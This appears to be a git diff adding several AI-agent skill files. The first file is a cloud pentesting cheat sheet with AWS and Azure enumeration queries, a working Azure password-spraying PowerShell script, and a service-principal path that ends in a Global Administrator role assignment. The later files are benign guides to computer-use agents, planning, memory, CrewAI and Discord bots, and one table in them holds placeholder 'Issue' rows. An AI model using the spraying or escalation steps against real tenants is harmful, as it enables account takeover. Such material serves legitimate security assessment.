## AWS Region Iteration Scripts

Create `regions.txt`:

```
us-east-1
us-east-2
us-west-1
us-west-2
ca-central-1
eu-west-1
eu-west-2
eu-west-3
eu-central-1
eu-north-1
ap-southeast-1
ap-southeast-2
ap-south-1
ap-northeast-1
ap-northeast-2
ap-northeast-3
sa-east-1
```

### List All EC2 Public IPs

```bash
while read r; do
  aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $r | jq -r '.[]' >> ec2-public-ips.txt
done < regions.txt
sort -u ec2-public-ips.txt -o ec2-public-ips.txt
```

### List All ELB DNS Addresses

```bash
while read r; do
  aws elbv2 describe-load-balancers --query LoadBalancers[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
  aws elb describe-load-balancers --query LoadBalancerDescriptions[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
done < regions.txt
sort -u elb-public-dns.txt -o elb-public-dns.txt
```

### List All RDS DNS Addresses

```bash
while read r; do
  aws rds describe-db-instances --query=DBInstances[*].Endpoint.Address --region $r | jq -r '.[]' >> rds-public-dns.txt
done < regions.txt
sort -u rds-public-dns.txt -o rds-public-dns.txt
```

### Get CloudFormation Outputs

```bash
while read r; do
  aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region $r | jq -r '.[]' >> cloudformation-outputs.txt
done < regions.txt
```

## ScoutSuite jq Parsing Queries

### AWS Queries

```bash
# Find all Lambda environment variables
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
done

# Find world-listable S3 buckets
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
done

# Find all EC2 user data
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
done

# Find EC2 security groups that whitelist AWS CIDRs
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
done

# Find all unencrypted EC2 EBS volumes
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
done

# Find all unencrypted EC2 EBS snapshots
for d in */ ; do
  tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
done
```

### Azure Queries

```bash
# List all Azure App Service host names
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'

# List all Azure SQL servers
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'

# List all Azure virtual machine hostnames
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'

# List storage accounts
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'

# List disks encrypted with platform-managed keys
# (note: == is the jq comparison operator; a single = would be an error)
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type == "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
```

## Password Spraying with Az PowerShell

```powershell
$userlist = Get-Content userlist.txt
$passlist = Get-Content passlist.txt
$linenumber = 0
$count = $userlist.count
foreach($line in $userlist){
    $user = $line
    $pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
    $current = $linenumber + 1
    Write-Host -NoNewline ("`r[" + $current + "/" + $count + "] " + "Trying: " + $user + " and " + $passlist[$linenumber])
    $linenumber++
    $Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
    try {
        Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
        Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
        Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
    }
    catch {
        $Failure = $_.Exception
        if ($Failure -match "ID3242") { continue }
        else {
            Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
            Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
            Add-Content valid-creds.txt $Failure.Message
            Write-Host -ForegroundColor red $Failure.Message
        }
    }
}
```

## Service Principal Attack Path

```bash
# Reset the service principal credential
az ad sp credential reset --id <app_id>
az ad sp credential list --id <app_id>

# Login as the service principal
az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions

# Create a new user in the tenant
az ad user create --display-name <name> --password <password> --user-principal-name <upn>

# Add the user to Global Administrator via MS Graph
Body="{'principalId':'User Object ID', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body "$Body"
```

## Additional Tools Reference

| Tool | URL | Purpose |
|------|-----|---------|
| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
| MSOLSpray | github.com/dafthack | O365 password spraying |
| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |

## Vulnerable Training Environments

| Platform | URL | Purpose |
|----------|-----|---------|
| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
| Flaws Cloud | flaws.cloud | AWS CTF challenges |
| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |

315 skills/computer-use-agents/SKILL.md Normal file
@@ -0,0 +1,315 @@

---
name: computer-use-agents
description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
source: vibeship-spawner-skills (Apache 2.0)
---

# Computer Use Agents

## Patterns

### Perception-Reasoning-Action Loop

The fundamental architecture of computer use agents: observe the screen, reason about the next action, execute it, repeat. This loop integrates vision models with action execution through an iterative pipeline.

Key components:

1. PERCEPTION: Screenshot captures current screen state
2. REASONING: Vision-language model analyzes and plans
3. ACTION: Execute mouse/keyboard operations
4. FEEDBACK: Observe result, continue or correct

Critical insight: Vision agents are completely still during the "thinking" phase (1-5 seconds), creating a detectable pause pattern.

**When to use**: Building any computer use agent from scratch; integrating vision models with desktop control; understanding agent behavior patterns.

```python
from anthropic import Anthropic
from PIL import Image
import base64
import io
import pyautogui
import time

class ComputerUseAgent:
    """
    Perception-Reasoning-Action loop implementation.
    Based on Anthropic Computer Use patterns.
    """

    def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
        self.client = client
        self.model = model
        self.max_steps = 50      # Prevent runaway loops
        self.action_delay = 0.5  # Seconds between actions

    def capture_screenshot(self) -> str:
        """Capture screen and return base64 encoded image."""
        screenshot = pyautogui.screenshot()
        # Resize for token efficiency (1280x800 is a good balance)
        screenshot = screenshot.resize((1280, 800), Image.LANCZOS)

        buffer = io.BytesIO()
        screenshot.save(buffer, format="PNG")
        return base64.b64encode(buffer.getvalue()).decode()

    def execute_action(self, action: dict) -> dict:
        """Execute mouse/keyboard action on the computer."""
        action_type = action.get("type")

        if action_type == "click":
            x, y = action["x"], action["y"]
            button = action.get("button", "left")
            pyautogui.click(x, y, button=button)
            return {"success": True, "action": f"clicked at ({x}, {y})"}

        elif action_type == "type":
            text = action["text"]
            pyautogui.typewrite(text, interval=0.02)
            return {"success": True, "action": f"typed {len(text)} chars"}

        elif action_type == "key":
            key = action["key"]
            pyautogui.press(key)
            return {"success": True, "action": f"pressed {key}"}

        elif action_type == "scroll":
            direction = action.get("direction", "down")
            amount = action.get("amount", 3)
            scroll = -amount if direction == "down" else amount
            pyautogui.scroll(scroll)
            return {"success": True, "action": f"scrolled {direction} by {amount}"}

        return {"success": False, "error": f"unknown action: {action_type}"}
```

### Sandboxed Environment Pattern

Computer use agents MUST run in isolated, sandboxed environments. Never give agents direct access to your main system - the security risks are too high. Use Docker containers with virtual desktops.

Key isolation requirements:

1. NETWORK: Restrict to necessary endpoints only
2. FILESYSTEM: Read-only or scoped to temp directories
3. CREDENTIALS: No access to host credentials
4. SYSCALLS: Filter dangerous system calls
5. RESOURCES: Limit CPU, memory, time

The goal is "blast radius minimization" - if the agent goes wrong, damage is contained to the sandbox.

**When to use**: Deploying any computer use agent; testing agent behavior safely; running untrusted automation tasks.

```dockerfile
# Dockerfile for sandboxed computer use environment
# Based on Anthropic's reference implementation pattern

FROM ubuntu:22.04

# Install desktop environment
RUN apt-get update && apt-get install -y \
    xvfb \
    x11vnc \
    fluxbox \
    xterm \
    firefox \
    python3 \
    python3-pip \
    supervisor

# Security: Create non-root user
RUN useradd -m -s /bin/bash agent && \
    mkdir -p /home/agent/.vnc

# Install Python dependencies
COPY requirements.txt /tmp/
RUN pip3 install -r /tmp/requirements.txt

# Security: Drop capabilities
RUN apt-get install -y --no-install-recommends libcap2-bin && \
    setcap -r /usr/bin/python3 || true

# Copy agent code
COPY --chown=agent:agent . /app
WORKDIR /app

# Supervisor config for virtual display + VNC
COPY supervisord.conf /etc/supervisor/conf.d/

# Expose VNC port only (not desktop directly)
EXPOSE 5900

# Run as non-root
USER agent

CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
```

```yaml
# docker-compose.yml with security constraints
version: '3.8'

services:
  computer-use-agent:
    build: .
    ports:
      - "5900:5900"  # VNC for observation
      - "8080:8080"  # API for control

    # Security constraints
    security_opt:
      - no-new-privileges:true
      - seccomp:seccomp-profile.json

    # Resource limits
    deploy:
      resources:
        limits:
          cpus: '2'
          memory: 4G
        reservations:
          cpus: '0.5'
          memory: 1G

    # Network isolation
    networks:
      - agent-network

    # No access to host filesystem
    volumes:
      - agent-tmp:/tmp

    # Read-only root filesystem
    read_only: true
    tmpfs:
      - /run
      - /var/run

    # Environment
    environment:
      - DISPLAY=:99
      - NO_PROXY=localhost

networks:
  agent-network:
    driver: bridge
    internal: true  # No internet by default

volumes:
  agent-tmp:
```

```python
# Python wrapper with additional runtime sandboxing
import subprocess
import os
from dataclasses import dataclass

@dataclass
class SandboxConfig:
    max_cpu_seconds: int = 120
    max_memory_mb: int = 2048

def launch_sandboxed(cmd: list, config: SandboxConfig) -> subprocess.Popen:
    """Launch the agent process with OS-level resource limits applied."""
    def set_limits():
        import resource
        resource.setrlimit(resource.RLIMIT_CPU,
                           (config.max_cpu_seconds, config.max_cpu_seconds))
        resource.setrlimit(resource.RLIMIT_AS,
                           (config.max_memory_mb * 1024 * 1024,) * 2)
    return subprocess.Popen(cmd, preexec_fn=set_limits,
                            env={**os.environ, "DISPLAY": ":99"})
```

### Anthropic Computer Use Implementation

Official implementation pattern using Claude's computer use capability. Claude 3.5 Sonnet was the first frontier model to offer computer use. Claude Opus 4.5 is now the "best model in the world for computer use."

Key capabilities:

- screenshot: Capture current screen state
- mouse: Click, move, drag operations
- keyboard: Type text, press keys
- bash: Run shell commands
- text_editor: View and edit files

Tool versions:

- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
- computer_20250124 (all other models): Standard capabilities

Critical limitation: "Some UI elements (like dropdowns and scrollbars) might be tricky for Claude to manipulate" - Anthropic docs

**When to use**: Building production computer use agents; need highest quality vision understanding; full desktop control (not just browser).

```python
from anthropic import Anthropic
from anthropic.types.beta import (
    BetaToolComputerUse20241022,
    BetaToolBash20241022,
    BetaToolTextEditor20241022,
)
import subprocess
import base64
from PIL import Image
import io

class AnthropicComputerUse:
    """
    Official Anthropic Computer Use implementation.

    Requires:
    - Docker container with virtual display
    - VNC for viewing agent actions
    - Proper tool implementations
    """

    def __init__(self):
        self.client = Anthropic()
        self.model = "claude-sonnet-4-20250514"  # Best for computer use
        self.screen_size = (1280, 800)

    def get_tools(self) -> list:
        """Define computer use tools."""
        return [
            BetaToolComputerUse20241022(
                type="computer_20241022",
                name="computer",
                display_width_px=self.screen_size[0],
                display_height_px=self.screen_size[1],
            ),
            BetaToolBash20241022(
                type="bash_20241022",
                name="bash",
            ),
            BetaToolTextEditor20241022(
                type="text_editor_20241022",
                name="str_replace_editor",
            ),
        ]

    def execute_tool(self, name: str, input: dict) -> dict:
        """Execute a tool and return result."""
        if name == "computer":
            return self._handle_computer_action(input)
        elif name == "bash":
            return self._handle_bash(input)
        elif name == "str_replace_editor":
            return self._handle_editor(input)
        else:
            return {"error": f"Unknown tool: {name}"}

    def _handle_computer_action(self, input: dict) -> dict:
        """Handle computer control actions."""
        action = input.get("action")

        if action == "screenshot":
            # Capture via xdotool/scrot
            subprocess.run(["scrot", "/tmp/screenshot.png"])

            with open("/tmp/screenshot.png", "rb") as f:
                data = base64.b64encode(f.read()).decode()
            return {"type": "image", "media_type": "image/png", "data": data}

        return {"error": f"Unsupported action: {action}"}

    def _handle_bash(self, input: dict) -> dict:
        result = subprocess.run(input.get("command", ""), shell=True,
                                capture_output=True, text=True)
        return {"stdout": result.stdout, "stderr": result.stderr}

    def _handle_editor(self, input: dict) -> dict:
        # Minimal sketch: only the "view" command is handled here
        if input.get("command") == "view":
            with open(input["path"]) as f:
                return {"content": f.read()}
        return {"error": "Unsupported editor command"}
```

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Defense in depth - no single solution works |
| Issue | medium | Add human-like variance to actions |
| Issue | high | Use keyboard alternatives when possible |
| Issue | medium | Accept the tradeoff |
| Issue | high | Implement context management |
| Issue | high | Monitor and limit costs |
| Issue | critical | ALWAYS use sandboxing |

62 skills/concise-planning/SKILL.md Normal file
@@ -0,0 +1,62 @@

---
name: concise-planning
description: Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.
---

# Concise Planning

## Goal

Turn a user request into a **single, actionable plan** with atomic steps.

## Workflow

### 1. Scan Context

- Read `README.md`, docs, and relevant code files.
- Identify constraints (language, frameworks, tests).

### 2. Minimal Interaction

- Ask **at most 1–2 questions**, and only if truly blocking.
- Make reasonable assumptions for non-blocking unknowns.

### 3. Generate Plan

Use the following structure:

- **Approach**: 1-3 sentences on what and why.
- **Scope**: Bullet points for "In" and "Out".
- **Action Items**: A list of 6-10 atomic, ordered tasks (verb-first).
- **Validation**: At least one item for testing.

## Plan Template

```markdown
# Plan

<High-level approach>

## Scope

- In:
- Out:

## Action Items

- [ ] <Step 1: Discovery>
- [ ] <Step 2: Implementation>
- [ ] <Step 3: Implementation>
- [ ] <Step 4: Validation/Testing>
- [ ] <Step 5: Rollout/Commit>

## Open Questions

- <Question 1 (max 3)>
```

## Checklist Guidelines

- **Atomic**: Each step should be a single logical unit of work.
- **Verb-first**: "Add...", "Refactor...", "Verify...".
- **Concrete**: Name specific files or modules when possible.

53 skills/context-window-management/SKILL.md Normal file
@@ -0,0 +1,53 @@

---
name: context-window-management
description: "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot. Use when: context window, token limit, context management, context engineering, long context."
source: vibeship-spawner-skills (Apache 2.0)
---

# Context Window Management

You're a context engineering specialist who has optimized LLM applications handling millions of conversations. You've seen systems hit token limits, suffer context rot, and lose critical information mid-dialogue.

You understand that context is a finite resource with diminishing returns. More tokens doesn't mean better results—the art is in curating the right information. You know the serial position effect, the lost-in-the-middle problem, and when to summarize versus when to retrieve.

## Capabilities

- context-engineering
- context-summarization
- context-trimming
- context-routing
- token-counting
- context-prioritization

## Patterns

### Tiered Context Strategy

Different strategies based on context size.

### Serial Position Optimization

Place important content at the start and end; models attend least to the middle of long contexts.

### Intelligent Summarization

Summarize by importance, not just recency.

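A minimal sketch combining the three patterns: tiered handling by size, middle-of-context summarization, and serial position ordering. The 4-characters-per-token estimate is a rough heuristic, and `summarize` is a hypothetical stand-in for an LLM call:

```python
def estimate_tokens(text: str) -> int:
    # Rough heuristic: ~4 characters per token for English text
    return max(1, len(text) // 4)

def summarize(messages: list) -> str:
    # Hypothetical stand-in: in practice this would be an LLM call
    return "Summary of %d earlier messages" % len(messages)

def build_context(system: str, history: list, budget: int) -> list:
    """Tiered strategy: send everything while it fits; past the budget,
    summarize the middle and keep the start (instructions) and the end
    (recent turns), exploiting the serial position effect."""
    total = estimate_tokens(system) + sum(estimate_tokens(m) for m in history)
    if total <= budget:
        return [system] + history              # small context: as-is
    head, tail = history[:2], history[-6:]     # oldest grounding + recent turns
    middle = history[2:-6]
    return [system] + head + ([summarize(middle)] if middle else []) + tail
```

In practice, replace the character heuristic with a real tokenizer count for the model in use.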
## Anti-Patterns

### ❌ Naive Truncation

### ❌ Ignoring Token Costs

### ❌ One-Size-Fits-All

## Related Skills

Works well with: `rag-implementation`, `conversation-memory`, `prompt-caching`, `llm-npc-dialogue`

61 skills/conversation-memory/SKILL.md Normal file
@@ -0,0 +1,61 @@

---
name: conversation-memory
description: "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory. Use when: conversation memory, remember, memory persistence, long-term memory, chat history."
source: vibeship-spawner-skills (Apache 2.0)
---

# Conversation Memory

You're a memory systems specialist who has built AI assistants that remember users across months of interactions. You've implemented systems that know when to remember, when to forget, and how to surface relevant memories.

You understand that memory is not just storage—it's about retrieval, relevance, and context. You've seen systems that remember everything (and overwhelm context) and systems that forget too much (frustrating users).

Your core principles:

1. Memory types differ—short-term, long-term, and entity memory each serve a different purpose

## Capabilities

- short-term-memory
- long-term-memory
- entity-memory
- memory-persistence
- memory-retrieval
- memory-consolidation

## Patterns

### Tiered Memory System

Different memory tiers for different purposes.

### Entity Memory

Store and update facts about entities.

### Memory-Aware Prompting

Include relevant memories in prompts.

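The entity pattern can be sketched as a small store with per-user isolation (the `EntityMemory` class is illustrative, not from a specific library):

```python
from collections import defaultdict

class EntityMemory:
    """Store and update facts about entities, isolated per user."""

    def __init__(self):
        # user_id -> entity -> {attribute: value}
        self._store = defaultdict(lambda: defaultdict(dict))

    def remember(self, user_id: str, entity: str, attribute: str, value: str):
        # Later writes overwrite earlier ones: memory is updated, not appended
        self._store[user_id][entity][attribute] = value

    def recall(self, user_id: str, entity: str) -> dict:
        # Only this user's memories are visible (strict user isolation)
        return dict(self._store[user_id].get(entity, {}))

    def render_for_prompt(self, user_id: str, entities: list) -> str:
        """Memory-aware prompting: surface only the relevant entities."""
        lines = []
        for e in entities:
            facts = self.recall(user_id, e)
            if facts:
                lines.append(e + ": " + ", ".join(f"{k}={v}" for k, v in facts.items()))
        return "\n".join(lines)

mem = EntityMemory()
mem.remember("u1", "Alice", "role", "manager")
mem.remember("u1", "Alice", "timezone", "CET")
mem.remember("u2", "Alice", "role", "intern")   # different user, separate memory
```

Consolidation and forgetting policies would layer on top of `remember`.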
## Anti-Patterns
|
||||
|
||||
### ❌ Remember Everything
|
||||
|
||||
### ❌ No Memory Retrieval
|
||||
|
||||
### ❌ Single Memory Store
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Memory store grows unbounded, system slows | high | // Implement memory lifecycle management |
|
||||
| Retrieved memories not relevant to current query | high | // Intelligent memory retrieval |
|
||||
| Memories from one user accessible to another | critical | // Strict user isolation in memory |
|
||||
|
||||
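For the user-isolation edge, a minimal sketch of a store where every read and write is keyed by user ID, so one user's memories can never appear in another's retrieval (names are illustrative):

```python
class ScopedMemoryStore:
    """Illustrative user-scoped memory: each user gets a private partition."""

    def __init__(self):
        self._stores = {}  # user_id -> list of memories

    def add(self, user_id, memory):
        self._stores.setdefault(user_id, []).append(memory)

    def retrieve(self, user_id):
        # Only this user's partition is ever visible
        return list(self._stores.get(user_id, []))

store = ScopedMemoryStore()
store.add("user-a", "Prefers email contact")
store.add("user-b", "Based in Tokyo")
print(store.retrieve("user-a"))  # only user-a's memories
```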
## Related Skills

Works well with: `context-window-management`, `rag-implementation`, `prompt-caching`, `llm-npc-dialogue`
243 skills/crewai/SKILL.md Normal file
@@ -0,0 +1,243 @@
---
name: crewai
description: "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents."
source: vibeship-spawner-skills (Apache 2.0)
---

# CrewAI

**Role**: CrewAI Multi-Agent Architect

You are an expert in designing collaborative AI agent teams with CrewAI. You think
in terms of roles, responsibilities, and delegation. You design clear agent personas
with specific expertise, create well-defined tasks with expected outputs, and
orchestrate crews for optimal collaboration. You know when to use sequential vs
hierarchical processes.

## Capabilities

- Agent definitions (role, goal, backstory)
- Task design and dependencies
- Crew orchestration
- Process types (sequential, hierarchical)
- Memory configuration
- Tool integration
- Flows for complex workflows

## Requirements

- Python 3.10+
- crewai package
- LLM API access

## Patterns

### Basic Crew with YAML Config

Define agents and tasks in YAML (recommended)

**When to use**: Any CrewAI project
```python
# config/agents.yaml
researcher:
  role: "Senior Research Analyst"
  goal: "Find comprehensive, accurate information on {topic}"
  backstory: |
    You are an expert researcher with years of experience
    in gathering and analyzing information. You're known
    for your thorough and accurate research.
  tools:
    - SerperDevTool
    - WebsiteSearchTool
  verbose: true

writer:
  role: "Content Writer"
  goal: "Create engaging, well-structured content"
  backstory: |
    You are a skilled writer who transforms research
    into compelling narratives. You focus on clarity
    and engagement.
  verbose: true

# config/tasks.yaml
research_task:
  description: |
    Research the topic: {topic}

    Focus on:
    1. Key facts and statistics
    2. Recent developments
    3. Expert opinions
    4. Contrarian viewpoints

    Be thorough and cite sources.
  agent: researcher
  expected_output: |
    A comprehensive research report with:
    - Executive summary
    - Key findings (bulleted)
    - Sources cited

writing_task:
  description: |
    Using the research provided, write an article about {topic}.

    Requirements:
    - 800-1000 words
    - Engaging introduction
    - Clear structure with headers
    - Actionable conclusion
  agent: writer
  expected_output: "A polished article ready for publication"
  context:
    - research_task  # Uses output from research

# crew.py
from crewai import Agent, Task, Crew, Process
from crewai.project import CrewBase, agent, task, crew

@CrewBase
class ContentCrew:
    agents_config = 'config/agents.yaml'
    tasks_config = 'config/tasks.yaml'

    @agent
    def researcher(self) -> Agent:
        return Agent(config=self.agents_config['researcher'])

    @agent
    def writer(self) -> Agent:
        return Agent(config=self.agents_config['writer'])

    @task
    def research_task(self) -> Task:
        return Task(config=self.tasks_config['research_task'])

    @task
    def writing_task(self) -> Task:
        return Task(config=self.tasks_config['writing_task'])

    @crew
    def crew(self) -> Crew:
        return Crew(
            agents=self.agents,  # collected from @agent methods
            tasks=self.tasks,    # collected from @task methods
            process=Process.sequential,
            verbose=True
        )
```
### Hierarchical Process

Manager agent delegates to workers

**When to use**: Complex tasks needing coordination

```python
from crewai import Agent, Crew, Process
from langchain_openai import ChatOpenAI

# Define specialized agents
researcher = Agent(
    role="Research Specialist",
    goal="Find accurate information",
    backstory="Expert researcher..."
)

analyst = Agent(
    role="Data Analyst",
    goal="Analyze and interpret data",
    backstory="Expert analyst..."
)

writer = Agent(
    role="Content Writer",
    goal="Create engaging content",
    backstory="Expert writer..."
)

# Hierarchical crew - manager coordinates
crew = Crew(
    agents=[researcher, analyst, writer],
    tasks=[research_task, analysis_task, writing_task],
    process=Process.hierarchical,
    manager_llm=ChatOpenAI(model="gpt-4o"),  # Manager model
    verbose=True
)

# Manager decides:
# - Which agent handles which task
# - When to delegate
# - How to combine results

result = crew.kickoff()
```
### Planning Feature

Generate execution plan before running

**When to use**: Complex workflows needing structure

```python
from crewai import Crew, Process
from langchain_openai import ChatOpenAI

# Enable planning
crew = Crew(
    agents=[researcher, writer, reviewer],
    tasks=[research, write, review],
    process=Process.sequential,
    planning=True,  # Enable planning
    planning_llm=ChatOpenAI(model="gpt-4o")  # Planner model
)

# With planning enabled:
# 1. CrewAI generates step-by-step plan
# 2. Plan is injected into each task
# 3. Agents see overall structure
# 4. More consistent results

result = crew.kickoff()

# Access the plan
print(crew.plan)
```
## Anti-Patterns

### ❌ Vague Agent Roles

**Why bad**: Agent doesn't know its specialty.
Overlapping responsibilities.
Poor task delegation.

**Instead**: Be specific:
- "Senior React Developer" not "Developer"
- "Financial Analyst specializing in crypto" not "Analyst"
Include specific skills in backstory.

### ❌ Missing Expected Outputs

**Why bad**: Agent doesn't know done criteria.
Inconsistent outputs.
Hard to chain tasks.

**Instead**: Always specify expected_output:

expected_output: |
  A JSON object with:
  - summary: string (100 words max)
  - key_points: list of strings
  - confidence: float 0-1

### ❌ Too Many Agents

**Why bad**: Coordination overhead.
Inconsistent communication.
Slower execution.

**Instead**: 3-5 agents with clear roles.
One agent can handle multiple related tasks.
Use tools instead of agents for simple actions.

## Limitations

- Python-only
- Best for structured workflows
- Can be verbose for simple cases
- Flows are newer feature

## Related Skills

Works well with: `langgraph`, `autonomous-agents`, `langfuse`, `structured-output`
277 skills/discord-bot-architect/SKILL.md Normal file
@@ -0,0 +1,277 @@
---
name: discord-bot-architect
description: "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding."
source: vibeship-spawner-skills (Apache 2.0)
---

# Discord Bot Architect

## Patterns

### Discord.js v14 Foundation

Modern Discord bot setup with Discord.js v14 and slash commands

**When to use**: Building Discord bots with JavaScript/TypeScript; need full gateway connection with events; building bots with complex interactions
```javascript
// src/index.js
const { Client, Collection, GatewayIntentBits, Events } = require('discord.js');
const fs = require('node:fs');
const path = require('node:path');
require('dotenv').config();

// Create client with minimal required intents
const client = new Client({
  intents: [
    GatewayIntentBits.Guilds,
    // Add only what you need:
    // GatewayIntentBits.GuildMessages,
    // GatewayIntentBits.MessageContent, // PRIVILEGED - avoid if possible
  ]
});

// Load commands
client.commands = new Collection();
const commandsPath = path.join(__dirname, 'commands');
const commandFiles = fs.readdirSync(commandsPath).filter(f => f.endsWith('.js'));

for (const file of commandFiles) {
  const filePath = path.join(commandsPath, file);
  const command = require(filePath);
  if ('data' in command && 'execute' in command) {
    client.commands.set(command.data.name, command);
  }
}

// Load events
const eventsPath = path.join(__dirname, 'events');
const eventFiles = fs.readdirSync(eventsPath).filter(f => f.endsWith('.js'));

for (const file of eventFiles) {
  const filePath = path.join(eventsPath, file);
  const event = require(filePath);
  if (event.once) {
    client.once(event.name, (...args) => event.execute(...args));
  } else {
    client.on(event.name, (...args) => event.execute(...args));
  }
}

client.login(process.env.DISCORD_TOKEN);
```
```javascript
// src/commands/ping.js
const { SlashCommandBuilder } = require('discord.js');

module.exports = {
  data: new SlashCommandBuilder()
    .setName('ping')
    .setDescription('Replies with Pong!'),

  async execute(interaction) {
    const sent = await interaction.reply({
      content: 'Pinging...',
      fetchReply: true
    });

    const latency = sent.createdTimestamp - interaction.createdTimestamp;
    await interaction.editReply(`Pong! Latency: ${latency}ms`);
  }
};
```
```javascript
// src/events/interactionCreate.js
const { Events } = require('discord.js');

module.exports = {
  name: Events.InteractionCreate,
  async execute(interaction) {
    if (!interaction.isChatInputCommand()) return;
    const command = interaction.client.commands.get(interaction.commandName);
    if (command) await command.execute(interaction);
  }
};
```
### Pycord Bot Foundation

Discord bot with Pycord (Python) and application commands

**When to use**: Building Discord bots with Python; prefer async/await patterns; need good slash command support
```python
# main.py
import os
import discord
from discord.ext import commands
from dotenv import load_dotenv

load_dotenv()

# Configure intents - only enable what you need
intents = discord.Intents.default()
# intents.message_content = True  # PRIVILEGED - avoid if possible
# intents.members = True  # PRIVILEGED

bot = commands.Bot(
    command_prefix="!",  # Legacy, prefer slash commands
    intents=intents
)

@bot.event
async def on_ready():
    print(f"Logged in as {bot.user}")
    # Sync commands (do this carefully - see sharp edges)
    # await bot.sync_commands()

# Slash command
@bot.slash_command(name="ping", description="Check bot latency")
async def ping(ctx: discord.ApplicationContext):
    latency = round(bot.latency * 1000)
    await ctx.respond(f"Pong! Latency: {latency}ms")

# Slash command with options
@bot.slash_command(name="greet", description="Greet a user")
async def greet(
    ctx: discord.ApplicationContext,
    user: discord.Option(discord.Member, "User to greet"),
    message: discord.Option(str, "Custom message", required=False)
):
    msg = message or "Hello!"
    await ctx.respond(f"{user.mention}, {msg}")

# Load cogs
for filename in os.listdir("./cogs"):
    if filename.endswith(".py"):
